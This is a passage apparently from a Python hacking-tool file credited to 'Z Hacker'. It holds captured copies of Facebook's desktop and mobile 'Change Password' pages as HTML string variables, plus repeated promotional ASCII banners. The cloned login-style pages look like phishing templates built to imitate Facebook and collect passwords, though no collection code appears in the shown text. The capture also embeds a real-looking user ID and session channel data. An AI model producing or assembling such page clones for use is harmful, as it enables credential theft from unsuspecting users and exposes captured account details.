y":"l, j F Y","D M j, Y g:ia":"l, j F Y H:i","D, M j, Y":"l, j F Y","F d":"j F","F d, Y":"j F Y","F g":"j F","F j":"j F","F j, Y":"j F Y","F j, Y @ g:i A":"j F Y H:i","F j, Y g:i a":"j F Y H:i","F jS":"j F","F jS, g:ia":"j F H:i","F jS, Y":"j F Y","F Y":"F Y","g A":"H","g:i":"H:i","g:i A":"H:i","g:i a":"H:i","g:iA":"H:i","g:ia":"H:i","g:ia F jS, Y":"j F Y H:i","g:iA l, F jS":"l, j F Y H:i","g:ia M j":"j F H:i","g:ia M jS":"j F H:i","g:ia, F jS":"j F H:i","g:iA, l M jS":"l, j F Y H:i","g:sa":"H:i","H:I - M d, Y":"j F Y H:i","h:i a":"H:i","h:m:s m/d/Y":"d/m/Y H:i:s",j:"j","l F d, Y":"l, j F Y","l g:ia":"l H:i","l, F d, Y":"l, j F Y","l, F j":"j F","l, F j, Y":"l, j F Y","l, F jS":"j F","l, F jS, g:ia":"l, j F Y H:i","l, M j":"j F","l, M j, Y":"l, j F Y","l, M j, Y g:ia":"l, j F Y H:i","M d":"j F","M d, Y":"j F Y","M d, Y g:ia":"j F Y H:i","M d, Y ga":"j F Y H","M j":"j F","M j, Y":"j F Y","M j, Y g:i A":"j F Y H:i","M j, Y g:ia":"j F Y H:i","M jS, g:ia":"j F H:i","M Y":"F Y","M y":"j F","m-d-y":"d/m/Y","M. d":"j F","M. d, Y":"j F Y","j F Y":"j F Y","m.d.y":"d/m/Y","m/d":"d/m","m/d/Y":"d/m/Y","m/d/y":"d/m/Y","m/d/Y g:ia":"d/m/Y H:i","m/d/y H:i:s":"d/m/Y H:i:s","m/d/Y h:m":"d/m/Y H:i:s",n:"d/m","n/j":"d/m","n/j, g:ia":"d/m/Y H:i","n/j/y":"d/m/Y",Y:"Y","Y-m-d":"d/m/Y","Y/m/d":"d/m/Y","y/m/d":"d/m/Y","j / F / Y":"j / F / Y"},ordinalSuffixes:{"1":"st","2":"nd","3":"rd","4":"th","5":"th","6":"th","7":"th","8":"th","9":"th","10":"th","11":"th","12":"th","13":"th","14":"th","15":"th","16":"th","17":"th","18":"th","19":"th","20":"th","21":"st","22":"nd","23":"rd","24":"th","25":"th","26":"th","27":"th","28":"th","29":"th","30":"th","31":"st"}},165],["FBRTCExperimentsConfig",[],{rtc_browser_use_h264:{params:\{},auto_exposure:false,in_experiment:false},rtc_browser_use_vp9:{params:\{},auto_exposure:false,in_experiment:false},rtc_www_limit_p2p_framerate:{params:\{},auto_exposure:false,in_experiment:false},webrtc_enable_screen_sharing:{params:\{},auto_exposure:false,in_experiment:false},rtc_www_p2p_video_quality:{params:\{},auto_exposure:false,in_experiment:false},rtweb_incoming_call_experiments:{params:\{},auto_exposure:false,in_experiment:false},rtc_www_show_chat_while_in_call:{params:\{},auto_exposure:false,in_experiment:false},rtc_www_bypass_callability_check:{params:\{},auto_exposure:false,in_experiment:false}},986],["FantailConfig",[],{FantailLogQueue:null},1258],["MercuryDataSourceWrapper",["__inst_fa0b3e92_0_0","__inst_fa0b3e92_0_1","__inst_10011657_0_0"],{chat_typeahead_source:{__m:"__inst_fa0b3e92_0_0"},chat_add_people_source:{__m:"__inst_fa0b3e92_0_1"},chat_add_people_froup_source:{__m:"__inst_10011657_0_0"}},37],["MercurySoundsConfig",[],{camera_shutter_click_url:"https://static.xx.fbcdn.net/rsrc.php/yy/r/d4yuc1_LjMB.mp3",hot_like_grow_mp3_url:"https://static.xx.fbcdn.net/rsrc.php/yf/r/XyTteqB51ob.mp3",hot_like_pop_mp3_url:"https://static.xx.fbcdn.net/rsrc.php/yM/r/1Vcznk-uUR-.mp3",hot_like_outgoing_small_mp3_url:"https://static.xx.fbcdn.net/rsrc.php/yP/r/NUhwZHJ8fUZ.mp3",hot_like_outgoing_medium_mp3_url:"https://static.xx.fbcdn.net/rsrc.php/y8/r/a6onsWOBhsg.mp3",hot_like_outgoing_large_mp3_url:"https://static.xx.fbcdn.net/rsrc.php/yL/r/qi5pP1651Bi.mp3",hot_like_grow_ogg_url:"https://static.xx.fbcdn.net/rsrc.php/yU/r/9LbkezrNCLQ.ogg",hot_like_pop_ogg_url:"https://static.xx.fbcdn.net/rsrc.php/y5/r/ouE5maL6ab4.ogg",hot_like_outgoing_small_ogg_url:"https://static.xx.fbcdn.net/rsrc.php/y0/r/SbSSjevXDC6.ogg",hot_like_outgoing_medium_ogg_url:"https://static.xx.fbcdn.net/rsrc.php/yf/r/TNPmLer_j2q.ogg",hot_like_outgoing_large_ogg_url:"https://static.xx.fbcdn.net/rsrc.php/yf/r/8SNnbHD2mgk.ogg",settings_preview_sound_mp3_url:"https://static.xx.fbcdn.net/rsrc.php/y-/r/LtN9YjGtFwE.mp3",settings_preview_sound_ogg_url:"https://static.xx.fbcdn.net/rsrc.php/yG/r/T-VjgbwgLkm.ogg"},1596],["RTCConfig",[],{PeerConnectionStatsGK:false,CollabVCEndpointsVideoCallGK:true,CollabWhitelistedBrowserGK:false,CollabPrecallScreen:false,RenderPartiesMessengerAttachments:false,PassMessagesBetweenWindowsGK:true,RtcWwwVideoCallFiltersGK:false,ScreenSharingToGroupGK:false,ScreenSharingToMobileGK:false,ScreenSharingGK:false,rtc_message_logging:false,ringtone_mp3_url:"https://static.xx.fbcdn.net/rsrc.php/yh/r/taJw7SpZVz2.mp3",ringtone_ogg_url:"https://static.xx.fbcdn.net/rsrc.php/yO/r/kTasEyE42gs.ogg",ringback_mp3_url:"https://static.xx.fbcdn.net/rsrc.php/yA/r/QaLYA8XtNfH.mp3",ringback_ogg_url:"https://static.xx.fbcdn.net/rsrc.php/y9/r/VUaboMDNioG.ogg",CollaborationBrowserConfig:{ICE_disconnected_timeout:12000,ICE_failed_timeout:10000,ICE_recovery:true},CollaborationCallQuality:{screen:{height:720,width:1280,frameRate:30},screen_v2:{height:{max:1080},width:{max:1920},frameRate:{max:15,ideal:5}},videoToRoom:{height:720,width:1280,frameRate:30}},CollaborationDirectShareQuality:{height:{max:1080},width:{max:1920},frameRate:{max:30,min:15}},SendNewVCGK:true,ReceiveNewVCGK:true},760],["SoundInitialData",[],\{},482],["TrackingConfig",[],{domain:"https://pixel.facebook.com"},325],["CLDRDateRenderingClientRollout",[],{formatDateClientLoggerSamplingRate:0.0001},3003],["FluxConfig",[],{ads_improve_perf_flux_container_subscriptions:true,ads_improve_perf_flux_derived_store:true,ads_interfaces_push_model:true,ads_improve_perf_flux_cache_getall:true},2434],["NotificationBeeperItemRenderersList",["LiveVideoBeeperItemContents.react"],{LiveVideoBeeperItemContents:{__m:"LiveVideoBeeperItemContents.react"},LiveVideoNotificationRendererData:{__m:"LiveVideoBeeperItemContents.react"}},364],["NotificationRelationshipDelightsConfig",[],{shouldDecorateBadgeWithHearts:false,shouldDecorateNotificationWithHearts:false,shouldLogExposureForBadge:false,shouldLogExposureForNotification:false,universeName:"feed_relationship_delights_universe_2"},2837],["PinnedConversationNubsConfig",[],{isEnabled:true,useGraphQLSubscription:true,persistenceEnabled:false,sharedNotificationsReadStateEnabled:true,userSettingsIsEnabled:true,minimizedTabsEnabled:false,syncTabCloseEnabled:true,chatTabTypingPriority:false},1904],["ChannelInitialData",[],{channelConfig:{IFRAME_LOAD_TIMEOUT:30000,P_TIMEOUT:30000,STREAMING_TIMEOUT:70000,PROBE_HEARTBEATS_INTERVAL_LOW:1000,PROBE_HEARTBEATS_INTERVAL_HIGH:3000,MTOUCH_SEND_CLIENT_ID:1,user_channel:"p_100022900869586",seq:-1,retry_interval:0,max_conn:6,msgr_region:"ATN",viewerUid:"100022900869586",domain:"facebook.com",tryStreaming:true,trySSEStreaming:false,skipTimeTravel:false,uid:"100022900869586",sequenceId:53154},state:"reconnect!",reason:6},143],["KillabyteProfilerConfig",[],{htmlProfilerModule:null,profilerModule:null,depTypes:{BL:"bl",NON_BL:"non-bl"}},1145],["ImmediateActiveSecondsConfig",[],{sampling_rate:2003,ias_bucket:9},423],["TimeSpentConfig",[],{"0_delay":0,"0_timeout":8,delay:200000,timeout:64},142]]},last_in_phase:true,the_end:true});}),"onPageletArrive last_response",{"root":true,"pagelet":"last_response"})(); </script> <div class="_126d hidden_elem" style="top: 43px;"> <div aria-hidden="true" class="_5sqx _4-u2 _4-u8" style="top: initial;"> <div class="_zz9 _5im-"> <div> <div class="_5vx2 _5vx4"> <div class="_5vx7 clearfix" direction="both"> <div class="_ohe lfloat"> <ul class="_43o4 _4470" role="tablist"> <li class="_4gsg _5vwz _45hc" role="presentation"> <a aria-selected="false" class="_3m1v _468f" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="tab" tabindex="0"> <div class="_4jq5"> All </div> <span class="_13xf"> </span> </a> </li> <li class="_4gsg _5vwz _45hc" role="presentation"> <a aria-selected="false" class="_3m1v _468f" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="tab" tabindex="-1"> <div class="_4jq5"> Posts </div> <span class="_13xf"> </span> </a> </li> <li class="_4gsg _5vwz _45hc" role="presentation"> <a aria-selected="false" class="_3m1v _468f" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="tab" tabindex="-1"> <div class="_4jq5"> People </div> <span class="_13xf"> </span> </a> </li> <li class="_4gsg _5vwz _45hc" role="presentation"> <a aria-selected="false" class="_3m1v _468f" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="tab" tabindex="-1"> <div class="_4jq5"> Photos </div> <span class="_13xf"> </span> </a> </li> <li class="_4gsg _5vwz _45hc" role="presentation"> <a aria-selected="false" class="_3m1v _468f" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="tab" tabindex="-1"> <div class="_4jq5"> Videos </div> <span class="_13xf"> </span> </a> </li> <li class="_4gsg _5vwz _45hc" role="presentation"> <a aria-selected="false" class="_3m1v _468f" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="tab" tabindex="-1"> <div class="_4jq5"> Pages </div> <span class="_13xf"> </span> </a> </li> <li class="_4gsg _5vwz _45hc" role="presentation"> <a aria-selected="false" class="_3m1v _468f" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="tab" tabindex="-1"> <div class="_4jq5"> Places </div> <span class="_13xf"> </span> </a> </li> <li class="_4gsg _5vwz _45hc" role="presentation"> <a aria-selected="false" class="_3m1v _468f" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="tab" tabindex="-1"> <div class="_4jq5"> Groups </div> <span class="_13xf"> </span> </a> </li> <li class="_4gsg _5vwz _45hc" role="presentation"> <a aria-selected="false" class="_3m1v _468f" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="tab" tabindex="-1"> <div class="_4jq5"> Apps </div> <span class="_13xf"> </span> </a> </li> <li class="_4gsg _5vwz _45hc" role="presentation"> <a aria-selected="false" class="_3m1v _468f" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="tab" tabindex="-1"> <div class="_4jq5"> Events </div> <span class="_13xf"> </span> </a> </li> </ul> </div> </div> </div> </div> </div> </div> <div class="_126c"> <div class="_126b"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yq _55yo" role="progressbar"> </span> </div> </div> </div> <div class="uiContextualLayerPositioner uiLayer uiContextualLayerPositionerFixed hidden_elem" data-ownerid="js_12e" data-testid="undefined" style="width: 433px; left: 918px; top: 36px; z-index: 301; opacity: 1;"> <div aria-labelledby="" class="uiContextualLayer uiContextualLayerBelowLeft" style=""> <div class="uiTooltipX"> <div class="tooltipContent" data-testid="tooltip_testid" id="js_8"> <div class="tooltipText"> <span> Messages </span> </div> </div> <i class="arrow"> </i> </div> </div> </div> </body> </html> """ # _\__o__ __o/ o o o o__ __o o o/ o__ __o__/_ o__ __o # v |/ <|> <|> <|> /v v\ <|> /v <| v <| v\ # / < > < > / \ /> <\ / > /> < > / \ <\ # o/ | | o/ \o o/ \o__ __o/ | \o/ o/ # /v o__/_ _\__o <|__ __|> <| |__ __| o__/_ |__ _<| # /> | | / \ \\ | \ | | \ # o/ <o> <o> o/ \o \ / <o> \o <o> <o> \o # /v | | /v v\ o o | v\ | | v\ # /> _\o__/_ / \ / \ /> <\ <\__ __/> / \ <\ / \ _\o__/_ / \ <\ # # {Follow Me Here} # # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[Author: Z Hacker]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://twitter.com/_DEF9]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://www.youtube.com/c/ZhackerL]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # _\__o__ __o/ o o o o__ __o o o/ o__ __o__/_ o__ __o # v |/ <|> <|> <|> /v v\ <|> /v <| v <| v\ # / < > < > / \ /> <\ / > /> < > / \ <\ # o/ | | o/ \o o/ \o__ __o/ | \o/ o/ # /v o__/_ _\__o <|__ __|> <| |__ __| o__/_ |__ _<| # /> | | / \ \\ | \ | | \ # o/ <o> <o> o/ \o \ / <o> \o <o> <o> \o # /v | | /v v\ o o | v\ | | v\ # /> _\o__/_ / \ / \ /> <\ <\__ __/> / \ <\ / \ _\o__/_ / \ <\ # # {Follow Me Here} # # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[Author: Z Hacker]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://twitter.com/_DEF9]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://www.youtube.com/c/ZhackerL]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # _\__o__ __o/ o o o o__ __o o o/ o__ __o__/_ o__ __o # v |/ <|> <|> <|> /v v\ <|> /v <| v <| v\ # / < > < > / \ /> <\ / > /> < > / \ <\ # o/ | | o/ \o o/ \o__ __o/ | \o/ o/ # /v o__/_ _\__o <|__ __|> <| |__ __| o__/_ |__ _<| # /> | | / \ \\ | \ | | \ # o/ <o> <o> o/ \o \ / <o> \o <o> <o> \o # /v | | /v v\ o o | v\ | | v\ # /> _\o__/_ / \ / \ /> <\ <\__ __/> / \ <\ / \ _\o__/_ / \ <\ # # {Follow Me Here} # # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[Author: Z Hacker]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://twitter.com/_DEF9]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://www.youtube.com/c/ZhackerL]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # _\__o__ __o/ o o o o__ __o o o/ o__ __o__/_ o__ __o # v |/ <|> <|> <|> /v v\ <|> /v <| v <| v\ # / < > < > / \ /> <\ / > /> < > / \ <\ # o/ | | o/ \o o/ \o__ __o/ | \o/ o/ # /v o__/_ _\__o <|__ __|> <| |__ __| o__/_ |__ _<| # /> | | / \ \\ | \ | | \ # o/ <o> <o> o/ \o \ / <o> \o <o> <o> \o # /v | | /v v\ o o | v\ | | v\ # /> _\o__/_ / \ / \ /> <\ <\__ __/> / \ <\ / \ _\o__/_ / \ <\ # # {Follow Me Here} # # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[Author: Z Hacker]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://twitter.com/_DEF9]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://www.youtube.com/c/ZhackerL]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` #0xe2 Mobile_Facebook = """<!DOCTYPE html> <html> <head> <title> Change Password </title> <meta content="user-scalable=no,initial-scale=1,maximum-scale=1" name="viewport"/> <link href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/O2aKM2iSbOw.png" rel="apple-touch-icon-precomposed" sizes="196x196"/> <meta content="origin-when-crossorigin" id="meta_referrer" name="referrer"/> <link data-bootloader-hash="WeWRf" href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/W6ew1RSqSC_.css" rel="stylesheet" type="text/css"/> <link data-bootloader-hash="VzZ6Y" href="https://static.xx.fbcdn.net/rsrc.php/v3/yC/l/0,cross/1XgVzGCGCWq.css" rel="stylesheet" type="text/css"/> <link data-bootloader-hash="ZALnP" href="https://static.xx.fbcdn.net/rsrc.php/v3/y6/l/0,cross/BpXLEFgJAOu.css" rel="stylesheet" type="text/css"/> <link data-bootloader-hash="CvbkU" href="https://static.xx.fbcdn.net/rsrc.php/v3/yZ/l/0,cross/uUq3guesrjT.css" rel="stylesheet" type="text/css"/> <script id="u_0_p"> function envFlush(a)\{function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||\{},b(window.Env))}envFlush({"stratcom_event_profiler_hook":"1","timeslice_heartbeat_config":{"pollIntervalMs":33,"idleGapThresholdMs":60,"ignoredTimesliceNames":{"requestAnimationFrame":true,"Event listenHandler mousemove":true,"Event listenHandler mouseover":true,"Event listenHandler mouseout":true,"Event listenHandler scroll":true},"isHeartbeatEnabled":true,"isArtilleryOn":true},"shouldLogCounters":true,"timeslice_categories":{"react_render":true,"reflow":true},"sample_continuation_stacktraces":true,"dom_mutation_flag":true}); </script> <script> document.domain = 'facebook.com';/^#~?!(?:\\/?[\\w\\.-])+\\/?(?:\\?|$)/.test(location.hash)&&location.replace(location.hash.substr(location.hash.indexOf("!")+1)); </script> <script> __DEV__=0; </script> <script crossorigin="anonymous" data-bootloader-hash="xS4KI" id="u_0_q" src="https://static.xx.fbcdn.net/rsrc.php/v3iuD54/yh/l/en_US/rL33Hb041kd.js"> </script> <script id="u_0_r"> CavalryLogger=window.CavalryLogger||function(a)\{this.lid=a,this.transition=!1,this.metric_collected=!1,this.is_detailed_profiler=!1,this.instrumentation_started=!1,this.pagelet_metrics=\{},this.events=\{},this.ongoing_watch=\{},this.values={t_cstart:window._cstart},this.piggy_values=\{},this.bootloader_metrics=\{},this.resource_to_pagelet_mapping=\{},this.e2eLogged=!1,this.initializeInstrumentation&&this.initializeInstrumentation()},CavalryLogger.prototype.setIsDetailedProfiler=function(a){this.is_detailed_profiler=a;return this},CavalryLogger.prototype.setTTIEvent=function(a){this.tti_event=a;return this},CavalryLogger.prototype.setValue=function(a,b,c,d){d=d?this.piggy_values:this.values;(typeof d[a]=="undefined"||c)&&(d[a]=b);return this},CavalryLogger.prototype.getLastTtiValue=function(){return this.lastTtiValue},CavalryLogger.prototype.setTimeStamp=CavalryLogger.prototype.setTimeStamp||function(a,b,c,d){this.mark(a);var e=this.values.t_cstart||this.values.t_start;e=d?e+d:CavalryLogger.now();this.setValue(a,e,b,c);this.tti_event&&a==this.tti_event&&(this.lastTtiValue=e,this.setTimeStamp("t_tti",b));return this},CavalryLogger.prototype.mark=typeof console==="object"&&console.timeStamp?function(a){console.timeStamp(a)}:function()\{},CavalryLogger.prototype.addPiggyback=function(a,b){this.piggy_values[a]=b;return this},CavalryLogger.instances=\{},CavalryLogger.id=0,CavalryLogger.perfNubMarkup="",CavalryLogger.disableArtilleryOnUntilOffLogging=!1,CavalryLogger.getInstance=function(a){typeof a=="undefined"&&(a=CavalryLogger.id);CavalryLogger.instances[a]||(CavalryLogger.instances[a]=new CavalryLogger(a));return CavalryLogger.instances[a]},CavalryLogger.setPageID=function(a){if(CavalryLogger.id===0){var b=CavalryLogger.getInstance();CavalryLogger.instances[a]=b;CavalryLogger.instances[a].lid=a;delete CavalryLogger.instances[0]}CavalryLogger.id=a},CavalryLogger.setPerfNubMarkup=function(a){CavalryLogger.perfNubMarkup=a},CavalryLogger.now=function(){return window.performance&&performance.timing&&performance.timing.navigationStart&&performance.now?performance.now()+performance.timing.navigationStart:new Date().getTime()},CavalryLogger.prototype.measureResources=function()\{},CavalryLogger.prototype.profileEarlyResources=function()\{},CavalryLogger.getBootloaderMetricsFromAllLoggers=function()\{},CavalryLogger.start_js=function()\{},CavalryLogger.done_js=function()\{};CavalryLogger.getInstance().setTTIEvent("t_domcontent");CavalryLogger.prototype.measureResources=function(a,b){if(!this.log_resources)return;var c="bootload/"+a.name;if(this.bootloader_metrics[c]!==undefined||this.ongoing_watch[c]!==undefined)return;var d=CavalryLogger.now();this.ongoing_watch[c]=d;"start_"+c in this.bootloader_metrics||(this.bootloader_metrics["start_"+c]=d);b&&!("tag_"+c in this.bootloader_metrics)&&(this.bootloader_metrics["tag_"+c]=b);if(a.type==="js"){c="js_exec/"+a.name;this.ongoing_watch[c]=d}},CavalryLogger.prototype.stopWatch=function(a){if(this.ongoing_watch[a]){var b=CavalryLogger.now(),c=b-this.ongoing_watch[a];this.bootloader_metrics[a]=c;var d=this.piggy_values;a.indexOf("bootload")===0&&(d.t_resource_download||(d.t_resource_download=0),d.resources_downloaded||(d.resources_downloaded=0),d.t_resource_download+=c,d.resources_downloaded+=1,d["tag_"+a]=="_EF_"&&(d.t_pagelet_cssload_early_resources=b));delete this.ongoing_watch[a]}return this},CavalryLogger.getBootloaderMetricsFromAllLoggers=function(){var a=\{};Object.values(window.CavalryLogger.instances).forEach(function(b){b.bootloader_metrics&&Object.assign(a,b.bootloader_metrics)});return a},CavalryLogger.start_js=function(a){for(var b=0;b<a.length;++b)CavalryLogger.getInstance().stopWatch("js_exec/"+a[b])},CavalryLogger.done_js=function(a){for(var b=0;b<a.length;++b)CavalryLogger.getInstance().stopWatch("bootload/"+a[b])},CavalryLogger.prototype.profileEarlyResources=function(a){for(var b=0;b<a.length;b++)this.measureResources({name:a[b][0],type:a[b][1]?"js":""},"_EF_")};CavalryLogger.getInstance().log_resources=true;CavalryLogger.getInstance().setIsDetailedProfiler(true);window.CavalryLogger&&CavalryLogger.getInstance().setTimeStamp("t_start"); </script> <script id="u_0_s"> (function _(a,b,c,d){function e(a){document.cookie=a+"=;expires=Thu, 01-Jan-1970 00:00:01 GMT;path=/;domain=.facebook.com"}function f(a,b){document.cookie=a+"="+b+";path=/;domain=.facebook.com;secure"}if(!a){e(b);e(c);return}a=null;(navigator.userAgent.indexOf("Firefox")!==-1||!window.devicePixelRatio&&navigator.userAgent.indexOf("Windows Phone")!==-1)&&(document.documentElement!=null&&(a=screen.width/document.documentElement.offsetWidth,a=Math.max(1,Math.floor(a*2)/2)));(!a||a===1)&&navigator.userAgent.indexOf("IEMobile")!==-1&&(a=Math.sqrt(screen.deviceXDPI*screen.deviceYDPI)/96,a=Math.max(1,Math.round(a*2)/2));f(b,(a||window.devicePixelRatio||1).toString());e=window.screen?screen.width:0;b=window.screen?screen.height:0;f(c,e+"x"+b);d&&document.cookie&&window.devicePixelRatio>1&&document.location.reload()})(true, "m_pixel_ratio", "wd", false); </script> <meta content="AvpndGzuAwLY463N1HvHrsK3WE5yU5g6Fehz7Vl7bomqhPI/nYGOjVg3TI0jq5tQ5dP3kDSd1HXVtKMQyZPRxAAAAABleyJvcmlnaW4iOiJodHRwczovL2ZhY2Vib29rLmNvbTo0NDMiLCJmZWF0dXJlIjoiSW5zdGFsbGVkQXBwIiwiZXhwaXJ5IjoxNTEyNDI3NDA0LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=" data-expires="2017-12-04" data-feature="getInstalledRelatedApps" http-equiv="origin-trial"/> <link crossorigin="use-credentials" href="/data/manifest/" rel="manifest"/> </head> <body class="touch x1 _fzu _50-3 _2v9s" tabindex="0"> <script id="u_0_o"> (function(a){a.__updateOrientation=function(){var b=!!a.orientation&&a.orientation!==180,c=document.body;c&&(c.className=c.className.replace(/(^|\\s)(landscape|portrait)(\\s|$)/g," ")+" "+(b?"landscape":"portrait"));return b}})(window); </script> <div id="viewport"> <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0"> Facebook </h1> <div class="" id="page"> <div class="_129_" id="header-notices"> </div> <div class="_129-"> <div class="_52z5 _451a _3qet _17gp" data-sigil="MTopBlueBarHeader" id="header"> <div class="_4g33 _52we" id="mJewelNav"> <div class="_4g34"> <div class="_59te jewel _hzb noCount" data-sigil="nav-popover feed" data-store='{"tab":"feed"}' id="feed_jewel"> <a accesskey="1" class="_19no touchable" data-sigil="icon" href="/home.php" id="u_0_8"> <span style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0"> News Feed </span> <div class="_2ftp _62ta"> <div class="_59tf _2ftq"> <span class="_59tg" data-sigil="count"> 0 </span> </div> </div> </a> </div> </div> <div class="_4g34"> <div class="_59te jewel _hzb noCount" data-sigil="nav-popover requests" data-store='{"tab":"requests"}' id="requests_jewel"> <a accesskey="2" class="_19no touchable" data-sigil="icon" data-store='{"behavior":"custom"}' href="/friends/center/requests/" id="u_0_9"> <span style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0"> FRIEND REQUESTS </span> <div class="_2ftp _62ta"> <div class="_59tf _2ftq"> <span class="_59tg" data-sigil="count"> 0 </span> </div> </div> </a> <div class="flyout popover_hidden" data-sigil="flyout flyout" id="reqs_flyout" role="complementary"> <div data-sigil="flyout-content context-layer-root"> <header class="_52jh _4g33 _52we _5lm6" data-sigil="header"> <div class="_4g34"> FRIEND REQUESTS </div> <div class="_5s61"> <a aria-label="Find Friends" class="button touchable no-outline" href="/findfriends/browser/?fb_ref=jwl" id="u_0_a" role="button"> <i class="img sp_JPcPLf8sjbs sx_b4ad7c"> </i> </a> </div> </header> <ol class="_7k7 inner" data-sigil="contents requests-flyout-loading" id="mJewelRequestsFlyoutBody"> <li class="acw apl" data-sigil="marea"> <div style="text-align:center;"> <div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root" id="u_0_4"> </div> </div> </li> </ol> </div> <div class="_imu"> </div> </div> </div> </div> <div class="_4g34"> <div class="_59te jewel _hzb noCount" data-sigil="nav-popover messages" data-store='{"tab":"messages"}' id="messages_jewel"> <a accesskey="3" class="_19no touchable" data-sigil="icon" data-store='{"behavior":"custom"}' href="/messages/" id="u_0_b"> <span style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0"> Messages </span> <div class="_2ftp _62ta"> <div class="_59tf _2ftq"> <span class="_59tg" data-sigil="count"> 0 </span> </div> </div> </a> <div class="flyout popover_hidden" data-sigil="flyout" id="messages_flyout" role="complementary"> <div data-sigil="flyout-content context-layer-root"> <header class="_52je _52jb _52jh _4g33 _52we _2pi8 _2pi4"> <div class="_4g34"> <span data-sigil="messages_jewel_header_text"> Messages (2) </span> </div> <div class="_5s61"> <a aria-label="Compose Message" class="button touchable no-outline" data-sigil="dialog-link" data-store='{"dialogURI":"\\/messages\\/compose\\/dialog\\/"}' href="#" id="u_0_c" rel="dialog" role="button"> <span class="_5r0s _5r0v img"> <i class="_5r0t _4q9b img sp_JPcPLf8sjbs sx_aecbb1"> </i> <i class="_5r0u _4q9b img sp_JPcPLf8sjbs sx_be112a"> </i> </span> </a> </div> </header> <ol class="_7k7 inner" data-sigil="contents messages-flyout-loading" id="u_0_5"> <li class="acw apl" data-sigil="marea"> <div style="text-align:center;"> <div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root" id="u_0_6"> </div> </div> </li> </ol> </div> <div class="_imu"> </div> </div> </div> </div> <div class="_4g34"> <div class="_59te jewel _hzb _2cnm noCount" data-sigil="nav-popover notifications" data-store='{"tab":"notifications"}' id="notifications_jewel"> <a accesskey="4" class="_19no touchable" data-sigil="icon" data-store='{"behavior":"custom"}' href="/notifications.php" id="u_0_d"> <span style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0"> Notifications </span> <div class="_2ftp _62ta"> <div class="_59tf _2ftq"> <span class="_59tg" data-sigil="count"> 0 </span> </div> </div> </a> <div class="flyout popover_hidden" data-sigil="flyout flyout" id="notifications_flyout" role="complementary"> <div data-sigil="flyout-content context-layer-root"> <header class="_52je _52jb _52jh _4g33 _52we _2pi8 _2pi4"> <div class="_4g34"> Notifications </div> <div class="_5s61"> <a aria-label="Notification Settings" class="button touchable no-outline" href="/settings/notifications/" id="u_0_e" role="button"> <span class="_5r0s _5r0v img"> <i class="_5r0t _4q9b img sp_JPcPLf8sjbs sx_49cfb5"> </i> <i class="_5r0u _4q9b img sp_JPcPLf8sjbs sx_e81ad6"> </i> </span> </a> </div> </header> <div> <ol class="_7k7 inner _1azv" data-sigil="contents"> <li class="acw" data-sigil="live-notifications marea" id="u_0_f"> </li> <li class="aclb abt" data-sigil="notification marea" id="notif_1527773547839419"> <div class="touchable-notification"> <a class="touchable" data-sigil="touchable" data-store='{"notif_id":1527773547839419,"target_id":null}' href="https://m.facebook.com/support/view_details/?id=174446763394346&amp;ref_medium=textonly&amp;ref=notif&amp;notif_t=scase_reviewed&amp;second=0&amp;notif_id=1527773547839419"> <div class="ib"> <i class="img l" style="background:#d8dce6 url('https\\3a //static.xx.fbcdn.net/rsrc.php/v3/yw/r/iF3MhG7NKO-.png') no-repeat center;background-size:100% 100%;-webkit-background-size:100% 100%;width:43px;height:43px;"> </i> <div class="c"> We reviewed your report of <span 